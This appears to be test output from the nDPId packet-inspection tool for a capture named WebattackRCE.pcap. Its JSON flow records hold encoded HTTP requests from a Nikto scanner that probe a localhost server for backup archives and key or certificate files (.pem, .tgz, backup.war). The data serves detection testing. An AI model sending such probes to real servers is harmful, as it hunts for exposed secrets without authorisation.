00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277086,"pkt":"AAAAAAAAAAAAAAAACABFAADF4EhAAEAGW+h\/AAABfwAAAcOgH5AMu9gyVttcv4AYAED+uQAAAQEICp1m\/IadZvyGR0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277086,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
